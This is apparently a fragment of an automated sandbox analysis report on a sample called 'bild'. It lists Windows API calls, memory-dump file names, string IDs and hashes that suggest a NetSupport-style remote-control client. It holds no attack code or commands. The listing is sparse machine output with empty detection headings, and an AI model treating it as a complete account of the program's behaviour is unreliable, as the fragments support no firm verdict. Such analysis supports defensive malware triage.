                                                                                                      • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                                      APIs
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                                      • TranslateMessage.USER32(?), ref: 11027081
                                                                                                      • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                                      • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchSleepTranslate
                                                                                                      • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                      • API String ID: 3237117195-3850961587
                                                                                                      • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                      • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                                      • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                      • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                                      APIs
                                                                                                      • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                                      • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                                      • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                      • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                      • API String ID: 1092798621-1973987134
                                                                                                      • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                      • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                                      • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                      • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                                      APIs
                                                                                                        • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                                        • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                                      • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                                      • _calloc.LIBCMT ref: 1112B3AD
                                                                                                      • _free.LIBCMT ref: 1112B44B
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                      • String ID: ntohl$ws2_32.dll
                                                                                                      • API String ID: 2881363997-4165132517
                                                                                                      • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                      • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                                      • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                      • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 2427920155-3145022300
                                                                                                      • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                                      • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                                      • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                                      • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                                      APIs
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                      • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                      • API String ID: 3960414890-2201682149
                                                                                                      • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                      • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                                      • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                      • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                                      APIs
                                                                                                      • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                                      • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                      • API String ID: 468487828-934300333
                                                                                                      • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                      • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                                      • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                      • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                                      • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                                      • GetCursorPos.USER32(?), ref: 111192A1
                                                                                                      • GetTickCount.KERNEL32 ref: 111192B6
                                                                                                      • GetTickCount.KERNEL32 ref: 11119337
                                                                                                      • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                                      • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                                      • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4245181967-0
                                                                                                      • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                      • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                                      • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                                      • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                                      APIs
                                                                                                      • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                                      • _strncat.LIBCMT ref: 1102518B
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                                      • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                                      • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                                      • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                                      • SetFocus.USER32(?), ref: 11025265
                                                                                                        • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3832070631-0
                                                                                                      • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                      • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                                      • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                                      • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                                      APIs
                                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,4764EAAA,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4764EAAA,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4764EAAA,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                                        • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4764EAAA,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4764EAAA,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                                        • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,4764EAAA,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                                      • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                                      • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                      • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                      • API String ID: 3780373956-3165951319
                                                                                                      • Opcode ID: 13b000d7faa6fd9acbdfe3c5b590adeb65eceb06c65d3f1f2622c8f441c886b5
